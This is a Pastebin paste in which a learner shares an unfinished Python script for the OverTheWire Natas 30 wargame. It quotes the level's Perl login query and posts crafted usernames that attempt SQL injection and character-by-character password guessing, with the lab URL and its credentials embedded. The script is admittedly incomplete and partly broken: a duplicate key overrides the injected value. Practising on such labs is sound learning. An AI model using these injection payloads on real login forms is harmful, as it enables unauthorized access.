Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- # This is the exploitable perl DB Query
- """if ('POST' eq request_method && param('username') && param('password')){
- my $dbh = DBI->connect( "DBI:mysql:database_name","database_name", "<censored>", {'RaiseError' => 1});
- my $query="Select * FROM users where username =".$dbh->quote(param('username')) . " and password =".$dbh->quote(param('password'));
- my $sth = $dbh->prepare($query);
- $sth->execute();
- my $ver = $sth->fetch();
- if ($ver){
- print "win!<br>";
- print "here is your result:<br>";
- print @$ver;
- }
- else{
- print "fail";
- }
- $sth->finish();
- $dbh->disconnect();
- }"""
- # All I could find was this SO post: https://stackoverflow.com/questions/40273267/is-perl-function-dbh-quote-still-secure
- # So that is what I tries, but maybe just don't get it.
- import requests
- import re
- import string
- CHAR_SET = string.ascii_letters + string.digits
- PASSWORD_LENGHT = 32
- session = requests.Session()
- def natas30(url):
- for char in CHAR_SET:
- # I think it needs to be done like this,
- # see https://stackoverflow.com/questions/40273267/is-perl-function-dbh-quote-still-secure
- # But unsure how to proceed after this
- params={"username": 'natas30" and password like binary "{char}%', "username": 30, "password": "x"}
- response = session.post(url, data=params)
- # print(response.text)
- if 'fail' in response.text:
- print("FAILED")
- else:
- print(char)
- print("SUCCES")
- if __name__ == '__main__':
- url = 'http://natas30:wie9iexae0Daihohv8vuu3cei9wahf0e@natas30.natas.labs.overthewire.org/'
- natas30(url)
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement